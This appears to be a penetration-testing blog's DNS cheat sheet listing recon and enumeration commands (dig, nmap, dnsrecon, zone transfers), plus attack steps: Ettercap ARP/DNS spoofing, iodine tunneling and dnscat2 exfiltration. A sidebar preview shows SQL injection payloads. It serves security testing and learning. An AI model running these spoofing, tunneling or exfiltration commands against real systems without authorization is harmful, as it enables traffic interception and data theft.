Skip to main content

DNS Pentest - Port 53


Recon


Banner Grabbing - Identify DNS Server Versions

# Use dig to determine DNS server versions
dig version.bind CHAOS TXT @DNS

# Alternatively, use nmap script to grab the banner
nmap --script dns-nsid <DNS_IP>

# Alternatively, use telnet to grab the banner
nc -nv -u <DNS_IP> 53
DNS Server Discovery
# Using dig
dig NS <target-domain>

# Using nslookup
nslookup -type=NS <target-domain>

Enumeration


Using DNS enum
dnsenum --dnsserver <DNS_IP> --enum -p 0 -s 0 -o subdomains.txt -f <WORDLIST> <DOMAIN>



Using dig

# Query DNS records
dig hackviser.com

# Query specific type of DNS records (e.g., A record)
dig A hackviser.com

# Perform a reverse DNS lookup
dig -x <IP_ADDRESS>

# Query a specific DNS server
dig @<DNS_SERVER_IP> hackviser.com



Using nslookup

# Perform DNS queries
nslookup hackviser.com

# Query a specific type of DNS record (e.g., MX record)
nslookup -type=MX hackviser.com

# Query a specific DNS server
nslookup hackviser.com <DNS_IP>


Using host

# Perform DNS query
host hackviser.com

# Query specific type of DNS records (e.g., MX record)
host -t MX hackviser.com

# Perform a reverse DNS lookup
host <IP_ADDRESS>


Any Record Query

dig any victim.com @<DNS_IP>



Zone Transfer

# Without specifying a domain
dig axfr @<DNS_IP>

# With guessing the domain
dig axfr @<DNS_IP> <DOMAIN>

# Alternatively, you can use fierce for zone transfers or dictionary attacks
fierce --domain <DOMAIN> --dns-servers <DNS_IP>



Metasploit Modules and Nmap Scripts

msfconsole (use auxiliary/gather/enum_dns)

nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" <IP>

#Find the DNS server 
nmap --script vuln,vulners --script-args mincvss=7.0 -sC -sV -p 53 --open 10.10.0.0/16

nmap -sU -sV --script "dns* and (discovery or vuln) and not (dos or brute)" -p53 10.10.10.10


#DNS Server Processes Unauthoritative Recursive Queries
nmap -Pn -p 53 -sU --script dns-recursion 10.10.10.10

#DNS Server Cache Snooping Remote Information Disclosure
nmap -Pn -sU -sV -p 53 --script dns-cache-snoop 10.10.10.10


#DNS Enum via Metasploit
auxiliary/gather/enum_dns

auxiliary/scanner/dns/dns_amp



# DNS Enum 

nslookup
>SERVER 10.10.10.1
# Give the ip address of the server to find its hostname 
> 10.10.10.10 
10.10.10.10.in-addr.arpa      name = host02.test.domain.

dig axfr host02.test.domain @10.10.10.1



DNS Reverse and Subdomain Brute Force
dnsrecon -r 127.0.0.0/24 -n <IP_DNS>
dnsrecon -r 127.0.1.0/24 -n <IP_DNS>
dnsrecon -r <IP_DNS>/24 -n <IP_DNS>
dnsrecon -d active.htb -a -n <IP_DNS>



DNS Cache Snooping

# Querying the DNS cache
dnsrecon -t std -d hackviser.com -D /usr/share/dnsrecon/namelist.txt



DNS Enumeration with Google Dorks

# Collecting DNS information using Google Dorks
site:hackviser.com -www.hackviser.com -site:www.hackviser.com



DNS Hacking tools
DNS Dumpster
DNS Recon
Spyse
SecurityTrails
DNSlytics


DNS CertSpotter

Subdomain Enumeration


Attack Vectors


DNS Spoofing
Poisoning with Ettercap
ettercap -T -q -M arp:remote /<gateway-ip>// /<target-ip>// -P dns_spoof
DNS Tunneling

# Server side
iodined -f -c <tunnel-ip> <domain>

# Client side
iodine <dns-server-ip> <domain>

Post-Exploitation


Cache Snooping
dig @<dns-server> <domain> +norecurse


Reverse DNS Lookup
dig -x <ip-address>
Exfiltration with dnscat2
# Server side
dnscat2 --dns server=<dns-server-ip>:53

# Client side
dnscat2 <domain>

Labels:

Comments

Post a Comment

Popular posts from this blog

Powershell Automation Basics - Part 1

Pentest Notes: PowerShell Automation - Basics Pentest Notes: PowerShell Automation - Basics These notes cover PowerShell automation for penetration testing, focusing on practical applications and techniques. What is PowerShell? A powerful scripting language and command-line shell built on the .NET framework, heavily integrated with Windows. Ideal for system administration and automation, making it a valuable tool for pentesters. Why PowerShell for Pentesting? Native to Windows: Pre-installed on most Windows systems. Object-oriented: Allows for complex data manipulation and interaction with APIs. Access to .NET Framework: Enables interaction with a vast library of classes and functions. Remoting capabilities: Execute commands on remote systems. Bypass security restrictions: Can be used to circumvent some security measures if not properly configured. Basic Syntax Cmdlets: Commands in PowerShell (e.g., Get-Process , Get-Service , Get-ChildItem ). P...
Post a Comment
Read more

SQLDB Pentest

Pivoting for Red Teamers SQL Database & SQL Injection Pentesting Cheat Sheet SQL databases store crucial application data, and misconfigurations can make them vulnerable to SQL Injection (SQLi) attacks. This guide covers database enumeration, privilege escalation, and SQL injection techniques. Step 1: Identifying SQL Database Type Check the database type by sending payloads in the input fields or URL: ' OR 1=1 -- (MySQL, PostgreSQL, MSSQL) ' UNION SELECT 1,2,3 -- (Check column count) ' AND 1=CONVERT(int,@@version) -- (MSSQL Test) Observe the error messages for database identification. Step 2: Enumerating Database Tables & Columns Use SQL queries to extract database structure. For MySQL: SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE(); SELECT column_name FROM information_schema.columns WHERE table_name='user...
Post a Comment
Read more

DAMN BASH

Bash Scripting: From Basic to Advanced Bash Scripting: From Basic to Advanced Bash (Bourne Again SHell) is a powerful command-line interpreter and scripting language commonly used in Linux and macOS environments. This post covers Bash scripting from basic commands to more advanced techniques. I. Basic Commands These commands are the building blocks of Bash scripting: Command Description ls Lists files and directories. cd Changes the current directory. pwd Prints the current working directory. mkdir Creates a new directory. rm Removes files or directories (use with caution!). cp Copies files or directories. mv Moves or renames files or directories. cat Displays file content. echo Prints text to the console. II. Variables Variables store data that can be used in your scripts: name="John Doe" echo "Hello, $name!" age=30 echo $((age + 5)) # Arithmetic operations III. Input/Output Redirection Redirect input an...
Post a Comment
Read more